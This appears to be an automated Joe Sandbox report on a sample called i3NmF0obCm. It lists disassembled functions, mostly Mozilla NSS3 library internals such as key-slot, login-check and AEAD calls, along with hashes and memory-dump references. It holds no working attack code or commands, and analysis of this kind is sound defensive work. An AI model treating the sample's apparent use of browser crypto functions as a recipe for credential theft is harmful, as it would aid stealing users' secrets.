Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 8ab63894c7b7c4154ee0d5c90ff0970cfad63edec8145616820dd3f256e5dec9
Instruction ID: 545d985a58968cc8402ec2a71fdfa0af15a0ef286342ef4924a16ff6e7c84654
Opcode Fuzzy Hash: 8ab63894c7b7c4154ee0d5c90ff0970cfad63edec8145616820dd3f256e5dec9
Instruction Fuzzy Hash: C23128B1E002155FEF04CFA98C409AFB7A6AFC5328B189128E81997B41EB31DD15D7A9

Function 6C618C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C618C7C

Part of subcall function 6C6B9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C700A27), ref: 6C6B9DC6
Part of subcall function 6C6B9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C700A27), ref: 6C6B9DD1
Part of subcall function 6C6B9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6B9DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C618CB0
TlsGetValue.KERNEL32 ref: 6C618CD1
EnterCriticalSection.KERNEL32(?), ref: 6C618CE5
PR_Unlock.NSS3(?), ref: 6C618D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C618D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C618D93

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: b66ced2893d3c3f502c3430e81e928b193dedccc2564026d86522c12e825401b
Instruction ID: 9f3291ed547a66de8f8b614946bc0eea1d8d644feacbd8f4ea714a7cd0c6e3ae
Opcode Fuzzy Hash: b66ced2893d3c3f502c3430e81e928b193dedccc2564026d86522c12e825401b
Instruction Fuzzy Hash: 65312471E08701ABD7009F68CC447DAB7B0BF59319F15013AEA1967FA0D730A924C7C9

Function 6C612E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C60E728,?,00000038,?,?,00000000), ref: 6C612E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C612E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C612E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C612E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C612E9E
PR_Unlock.NSS3(?), ref: 6C612EAB
PR_Unlock.NSS3(?), ref: 6C612F0D

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 9d992e39bebda14b16ea19f72e45f6af12b0168aeede91b860b127f50d1c1953
Instruction ID: a5c1187e20a1b837e6393bdff0824d7ce3c1017979c7cfe7df74e1af854cd1e9
Opcode Fuzzy Hash: 9d992e39bebda14b16ea19f72e45f6af12b0168aeede91b860b127f50d1c1953
Instruction Fuzzy Hash: 5C31D6B5A04505AFEB00AF68DC448A6B779FF4A35AB048175EC08C7B11EB31DC64C7D5

Function 6C644470 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6C607296,00000000), ref: 6C644487
EnterCriticalSection.KERNEL32(?,?,?,6C607296,00000000), ref: 6C6444A0
PR_Unlock.NSS3(?,?,?,?,6C607296,00000000), ref: 6C6444BB
SECMOD_DestroyModule.NSS3(?,?,?,?,6C607296,00000000), ref: 6C6444DA
DeleteCriticalSection.KERNEL32(?,?,?,?,6C607296,00000000), ref: 6C644530
free.MOZGLUE(?,?,?,?,?,6C607296,00000000), ref: 6C64453C
PORT_FreeArena_Util.NSS3 ref: 6C64454F

Part of subcall function 6C62CAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C60B1EE,D958E836,?,6C6451C5), ref: 6C62CAFA
Part of subcall function 6C62CAA0: PR_UnloadLibrary.NSS3(?,6C6451C5), ref: 6C62CB09

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
String ID:
API String ID: 3590924995-0
Opcode ID: 763a92a6a8ea67ca548cdee65ece57203490fc223b8e49ee82e3cd9160299f1e
Instruction ID: f9c7bbac26668cc3b3d4735617b41a84b6435e5c2eb77acea4eb9184fad2d2f4
Opcode Fuzzy Hash: 763a92a6a8ea67ca548cdee65ece57203490fc223b8e49ee82e3cd9160299f1e
Instruction Fuzzy Hash: 77313EB4A046119FDB04BF79C085569BBF0FF05359F018669D89997B01EB70E898CFCA

Function 6C65CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C65CD93,?), ref: 6C65CEEE

Part of subcall function 6C6514C0: TlsGetValue.KERNEL32 ref: 6C6514E0
Part of subcall function 6C6514C0: EnterCriticalSection.KERNEL32 ref: 6C6514F5
Part of subcall function 6C6514C0: PR_Unlock.NSS3 ref: 6C65150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C65CD93,?), ref: 6C65CEFC

Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C6510F3
Part of subcall function 6C6510C0: EnterCriticalSection.KERNEL32(?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65110C
Part of subcall function 6C6510C0: PL_ArenaAllocate.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651141
Part of subcall function 6C6510C0: PR_Unlock.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651182
Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C65CD93,?), ref: 6C65CF0B

Part of subcall function 6C650840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6508B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C65CD93,?), ref: 6C65CF1D

Part of subcall function 6C64FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C648D2D,?,00000000,?), ref: 6C64FB85
Part of subcall function 6C64FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C64FBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C65CD93,?), ref: 6C65CF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C65CD93,?), ref: 6C65CF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C65CD93,?,?,?,?,?,?,?,?,?,?,?,6C65CD93,?), ref: 6C65CF78

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 7fe6a5ca66670dac718b61de2accc4082efc326b7581a601f9af184e86140249
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: CF11E7B1E002046BFB00AE667C41B7BB5EC9F4964DF604039EC0AD7741FB61D92886FA

Function 6C608C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C608C1B
EnterCriticalSection.KERNEL32 ref: 6C608C34
PL_ArenaAllocate.NSS3 ref: 6C608C65
PR_Unlock.NSS3 ref: 6C608C9C
PR_Unlock.NSS3 ref: 6C608CB6

Part of subcall function 6C69DD70: TlsGetValue.KERNEL32 ref: 6C69DD8C
Part of subcall function 6C69DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C69DDB4

Strings

KRAM, xrefs: 6C608C8F

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 829fdc463c66969cc5bd6bab00795c51982d8f57509b2dca22995456a70ac485
Instruction ID: 102eaf543deadcc987f64140bbced36618ca1abf7d3dec3b0e916ee672483f4d
Opcode Fuzzy Hash: 829fdc463c66969cc5bd6bab00795c51982d8f57509b2dca22995456a70ac485
Instruction Fuzzy Hash: 5C217FB1A056018FD704EF78C584569BBF4FF49308F05896ED8889B721EB35D889CB9A

Function 6C618E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C632E62,?,?,?,?,?,?,?,00000000,?,?,?,6C604F1C), ref: 6C618EA2

Part of subcall function 6C63F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C63F854
Part of subcall function 6C63F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C63F868
Part of subcall function 6C63F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C63F882
Part of subcall function 6C63F820: free.MOZGLUE(04C483FF,?,?), ref: 6C63F889
Part of subcall function 6C63F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C63F8A4
Part of subcall function 6C63F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C63F8AB
Part of subcall function 6C63F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C63F8C9
Part of subcall function 6C63F820: free.MOZGLUE(280F10EC,?,?), ref: 6C63F8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C632E62,?,?,?,?,?,?,?,00000000,?,?,?,6C604F1C), ref: 6C618EC3
TlsGetValue.KERNEL32(?,?,?,6C632E62,?,?,?,?,?,?,?,00000000,?,?,?,6C604F1C), ref: 6C618EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C632E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C618EF1
PR_Unlock.NSS3 ref: 6C618F20

Strings

b.cl, xrefs: 6C618E96, 6C618F25

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.cl
API String ID: 1978757487-2288819817
Opcode ID: 33336d7b7cdeaa2d7ed7f5855034bf5ab348d050590259853f54cc2ef78b624a
Instruction ID: 8051d5c74b6ad561405ffd9db1d8a625a47c05c4058cfda4126e68a64a2ce2c9
Opcode Fuzzy Hash: 33336d7b7cdeaa2d7ed7f5855034bf5ab348d050590259853f54cc2ef78b624a
Instruction Fuzzy Hash: FA219FB09097059FCB00AF29C584199BBF0FF49359F42856EEC989BB51DB30E854CBDA

Function 6C702C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C702CA0
PR_ExitMonitor.NSS3 ref: 6C702CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C702CD1
strdup.MOZGLUE(?), ref: 6C702CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C702D27

Strings

Loaded library %s (static lib), xrefs: 6C702D22

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 1bca6b33f849473fe585488080b3033ee2938724b4f432afd1bab0a80ef053f2
Instruction ID: 636c8db0a140b7354f80b5222f97659280b76b9a541b3bfbaf7a9db3fd6e56af
Opcode Fuzzy Hash: 1bca6b33f849473fe585488080b3033ee2938724b4f432afd1bab0a80ef053f2
Instruction Fuzzy Hash: 1C1190F27012109BEB009F15D959A6677B8EB4631EF94853ED80987B41DF31DC08CBA1

Function 6C650FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5F87ED,00000800,6C5EEF74,00000000), ref: 6C651000
PR_NewLock.NSS3(?,00000800,6C5EEF74,00000000), ref: 6C651016

Part of subcall function 6C6B98D0: calloc.MOZGLUE(00000001,00000084,6C5E0936,00000001,?,6C5E102C), ref: 6C6B98E5

PL_InitArenaPool.NSS3(00000000,security,6C5F87ED,00000008,?,00000800,6C5EEF74,00000000), ref: 6C65102B
TlsGetValue.KERNEL32(00000000,?,?,6C5F87ED,00000800,6C5EEF74,00000000), ref: 6C651044
free.MOZGLUE(00000000,?,00000800,6C5EEF74,00000000), ref: 6C651064

Strings

security, xrefs: 6C651025

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: bb3fce1963f25b6b36ba256ad09c89f44106a01fb68d5bbf1c772487ba084811
Instruction ID: f4ab82c8bfc2ee42ff9ae0d1ffd0bd6d2ac32d3bd99c1dc796ae308a7239e60c
Opcode Fuzzy Hash: bb3fce1963f25b6b36ba256ad09c89f44106a01fb68d5bbf1c772487ba084811
Instruction Fuzzy Hash: 6E016B30B4025097E7203F3C8C04B963678BF4774AFA14526E80897A51EF70C169DBD9

Function 00EF71F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(Y(,80000000,00000003,00000000,00000003,00000080,00000000,?,00EF2859,?), ref: 00EF720C
GetFileSizeEx.KERNEL32(000000FF,Y(), ref: 00EF7229
CloseHandle.KERNEL32(000000FF), ref: 00EF7237

Strings

Y(, xrefs: 00EF7221, 00EF724D, 00EF7224
Y(, xrefs: 00EF7208, 00EF720B

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: Y($Y(
API String ID: 1378416451-663630504
Opcode ID: 505daf9b807e508dab3aef2cc6aa47b1fb3759330b8bcd5d41e839a082374054
Instruction ID: 9a9b73a2f0453e89a38001dce5eaf05948e5851f4377b2c04680135c7c245aca
Opcode Fuzzy Hash: 505daf9b807e508dab3aef2cc6aa47b1fb3759330b8bcd5d41e839a082374054
Instruction Fuzzy Hash: 75F04475E14208BBEB24DFF0EC49FAEB77AAB44714F10D168F665B7184D6B09A409F40

Function 6C692E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C693046

Part of subcall function 6C67EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C67EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C667FFB), ref: 6C69312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C693154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C692E8B

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

Part of subcall function 6C67F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C669BFF,?,00000000,00000000), ref: 6C67F134

memcpy.VCRUNTIME140(8B3C75C0,?,6C667FFA), ref: 6C692EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C69317B

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: a8931dbb9d23e2cc3bd51a597da84b84c0208bc91a36d53bd9c20ad8ea76b2c9
Instruction ID: 188c5744720d85d7c593ef2af6fe675872183a88c89c07831fca50f0c241ec3b
Opcode Fuzzy Hash: a8931dbb9d23e2cc3bd51a597da84b84c0208bc91a36d53bd9c20ad8ea76b2c9
Instruction Fuzzy Hash: 2FA1CE71A002199FDB24CF54CC84BEAB7B5EF49308F048099ED4967781E731AE85CFA6

Function 6C65ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C65ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C65EDCE

Part of subcall function 6C650BE0: malloc.MOZGLUE(6C648D2D,?,00000000,?), ref: 6C650BF8
Part of subcall function 6C650BE0: TlsGetValue.KERNEL32(6C648D2D,?,00000000,?), ref: 6C650C15

free.MOZGLUE(00000000,?,?,?,?,6C65B04F), ref: 6C65EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C65EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C65EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C65EEFB

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: b25b89742f975e32238beedc6e781ef71c513db09282b8ffc26879489864e72f
Instruction ID: e72b088f92a95b7936926e1bce945fc97afed0713cd6c79deb8ab82ddb35e8d2
Opcode Fuzzy Hash: b25b89742f975e32238beedc6e781ef71c513db09282b8ffc26879489864e72f
Instruction Fuzzy Hash: 9C818DB1A002059FEF14CF55CC84BABB7F5BF89308F644428E8159B751DB35E825CBA9

Function 6C65CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C65C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C65DAE2,?), ref: 6C65C6C2

PR_Now.NSS3 ref: 6C65CD35

Part of subcall function 6C6B9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C700A27), ref: 6C6B9DC6
Part of subcall function 6C6B9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C700A27), ref: 6C6B9DD1
Part of subcall function 6C6B9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6B9DED

Part of subcall function 6C646C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C5F1C6F,00000000,00000004,?,?), ref: 6C646C3F

PR_GetCurrentThread.NSS3 ref: 6C65CD54

Part of subcall function 6C6B9BF0: TlsGetValue.KERNEL32(?,?,?,6C700A75), ref: 6C6B9C07

Part of subcall function 6C647260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C5F1CCC,00000000,00000000,?,?), ref: 6C64729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C65CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C65CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C65CE2C

Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C6510F3
Part of subcall function 6C6510C0: EnterCriticalSection.KERNEL32(?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65110C
Part of subcall function 6C6510C0: PL_ArenaAllocate.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651141
Part of subcall function 6C6510C0: PR_Unlock.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651182
Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C65CE40

Part of subcall function 6C6514C0: TlsGetValue.KERNEL32 ref: 6C6514E0
